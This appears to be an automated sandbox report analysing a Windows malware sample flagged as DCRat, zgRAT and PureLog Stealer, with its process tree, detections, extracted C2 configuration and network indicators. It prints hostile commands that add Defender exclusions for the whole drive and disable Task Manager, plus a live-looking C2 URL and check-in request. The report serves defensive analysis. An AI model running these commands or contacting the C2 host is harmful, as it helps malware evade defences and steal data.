Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OisrvsB6Ea.exe

Overview

General Information

Sample name:OisrvsB6Ea.exe
renamed because original name is a hash value
Original sample name:092F45DAC00EF24F3836DBFE18DFA931.exe
Analysis ID:1589235
MD5:092f45dac00ef24f3836dbfe18dfa931
SHA1:7583f7a96b649ff903b79615ac889fdd9c1fa94d
SHA256:6bc67978f583db1ef99eb832b456c978b8c42a5233f9ed5810fed58455e6cd6f
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Module File Created By Non-PowerShell Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

Process Tree

  • System is w10x64
  • OisrvsB6Ea.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\OisrvsB6Ea.exe" MD5: 092F45DAC00EF24F3836DBFE18DFA931)
    • wscript.exe (PID: 7496 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7888 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\XyQqwqHSpVeTNnNDm2Xa4eg.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7940 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • ComrefNetsvc.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe" MD5: 7A6B9E23ECCB90B36EB6A4FE87427D41)
          • powershell.exe (PID: 8016 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8024 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8040 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8076 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8108 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8144 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7172 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7220 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1744 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1544 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2652 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1704 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2336 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\sihost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7252 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\PrintHood\SearchApp.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7480 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft office\Office16\dasHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 9060 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 7440 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7552 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7180 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6840 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8504 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 8924 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • svchost.exe (PID: 9004 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://588538cm.renyash.ru/polldle", "MUTEX": "DCR_MUTEX-IlTr7bwNxEio1IRNv7Cv", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 7 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              00000008.00000000.1964321425.0000000000012000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000000.00000003.1668531861.00000000053CA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Process Memory Space: ComrefNetsvc.exe PID: 7956JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    8.0.ComrefNetsvc.exe.10000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                      8.0.ComrefNetsvc.exe.10000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Files With System Process Name In Unsuspected Locations
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, ProcessId: 7956, TargetFilename: C:\Program Files (x86)\microsoft office\Office16\dasHost.exe
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe", ParentImage: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, ParentProcessId: 7956, ParentProcessName: ComrefNetsvc.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 8016, ProcessName: powershell.exe
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\OisrvsB6Ea.exe", ParentImage: C:\Users\user\Desktop\OisrvsB6Ea.exe, ParentProcessId: 7436, ParentProcessName: OisrvsB6Ea.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" , ProcessId: 7496, ProcessName: wscript.exe
                        Sigma detected: PowerShell Module File Created By Non-PowerShell Process
                        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, ProcessId: 7956, TargetFilename: C:\Program Files\WindowsPowerShell\Modules\sihost.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe", ParentImage: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, ParentProcessId: 7956, ParentProcessName: ComrefNetsvc.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 8016, ProcessName: powershell.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\OisrvsB6Ea.exe", ParentImage: C:\Users\user\Desktop\OisrvsB6Ea.exe, ParentProcessId: 7436, ParentProcessName: OisrvsB6Ea.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" , ProcessId: 7496, ProcessName: wscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe", ParentImage: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, ParentProcessId: 7956, ParentProcessName: ComrefNetsvc.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 8016, ProcessName: powershell.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 9004, ProcessName: svchost.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-11T23:32:51.567229+010020480951A Network Trojan was detected192.168.2.449736104.21.38.8480TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: http://588538cm.renyash.ru/polldle.phpAvira URL Cloud: Label: malware
                        Antivirus detection for dropped file
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                        Source: C:\Program Files\WindowsPowerShell\Modules\sihost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                        Source: C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.batAvira: detection malicious, Label: BAT/Delbat.C
                        Found malware configuration
                        Source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://588538cm.renyash.ru/polldle", "MUTEX": "DCR_MUTEX-IlTr7bwNxEio1IRNv7Cv", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exeReversingLabs: Detection: 83%
                        Source: C:\Program Files\WindowsPowerShell\Modules\sihost.exeReversingLabs: Detection: 83%
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeReversingLabs: Detection: 83%
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeReversingLabs: Detection: 83%
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exeReversingLabs: Detection: 83%
                        Source: C:\Users\user\Desktop\BkJolhdT.logReversingLabs: Detection: 25%
                        Source: C:\Users\user\Desktop\DBQFDgRN.logReversingLabs: Detection: 37%
                        Source: C:\Users\user\Desktop\DjKnpLXK.logReversingLabs: Detection: 25%
                        Source: C:\Users\user\Desktop\FpiFczmJ.logReversingLabs: Detection: 37%
                        Source: C:\Users\user\Desktop\PVPluWhn.logReversingLabs: Detection: 20%
                        Source: C:\Users\user\Desktop\REWLTGNk.logReversingLabs: Detection: 20%
                        Source: C:\Users\user\Desktop\ZDjBezmV.logReversingLabs: Detection: 70%
                        Source: C:\Users\user\Desktop\amqbDjSR.logReversingLabs: Detection: 70%
                        Source: C:\Users\user\Desktop\pIbqPImn.logReversingLabs: Detection: 25%
                        Source: C:\Users\user\Desktop\xIogbBMY.logReversingLabs: Detection: 25%
                        Source: C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exeReversingLabs: Detection: 83%
                        Multi AV Scanner detection for submitted file
                        Source: OisrvsB6Ea.exeReversingLabs: Detection: 60%
                        Source: OisrvsB6Ea.exeVirustotal: Detection: 50%Perma Link
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                        Machine Learning detection for dropped file
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exeJoe Sandbox ML: detected
                        Source: C:\Program Files\WindowsPowerShell\Modules\sihost.exeJoe Sandbox ML: detected
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: OisrvsB6Ea.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Custom","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
                        Source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-IlTr7bwNxEio1IRNv7Cv","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                        Source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://588538cm.renyash.ru/","polldle"]]
                        Source: OisrvsB6Ea.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDirectory created: C:\Program Files\WindowsPowerShell\Modules\sihost.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDirectory created: C:\Program Files\WindowsPowerShell\Modules\66fc9ff0ee96c2Jump to behavior
                        Source: OisrvsB6Ea.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: OisrvsB6Ea.exe
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0027A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0027A69B
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0028C220
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
                        Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 104.21.38.84:80
                        Source: Joe Sandbox ViewIP Address: 104.21.38.84 104.21.38.84
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
